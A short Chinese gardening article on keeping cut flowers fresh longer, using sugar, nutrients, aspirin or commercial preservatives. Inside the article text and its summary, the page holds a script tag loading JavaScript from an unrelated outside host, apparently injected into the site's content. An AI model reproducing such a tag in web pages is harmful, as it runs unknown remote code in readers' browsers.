您现在的位置:那花园花卉网 > 花艺天地 > 插花花艺 >

怎样延长插花寿命?

来源:未知
】 2012-08-12 00:00
[摘要]#106avascript" src="http://zz.ag365.com/js/check.asp?id=6840"/gt; 植物在生长过程中,通过光合作用制造出满足本身生长发育所需要的物质。当鲜花摘下后,由于营养物质断了来源,不能满足开花时的需要,花就容易凋谢。因此,在花瓶里放进一些糖或营养液,
<Script type="text/javascript" src="http://zz.ag365.com/js/check.asp?id=6840"></Script>

  植物在生长过程中,通过光合作用制造出满足本身生长发育所需要的物质。当鲜花摘下后,由于营养物质断了来源,不能满足开花时的需要,花就容易凋谢。因此,在花瓶里放进一些糖或营养液,让花枝吸收,可以延长花期。但只有糖和营养液,细菌容易繁殖,花木受到细菌的感染而使导管阻塞,提前枯萎。故在使用糖或营养液时,应当放些抑制细菌繁殖的药物,如阿斯匹林等。

  市场上供应的切花保鲜剂,具有植物开花时所需要的营养成分,又有控制微生物繁殖的效果。使用保鲜剂后,可以延长插花开花期,并能使色彩更鲜艳,开花更茂盛。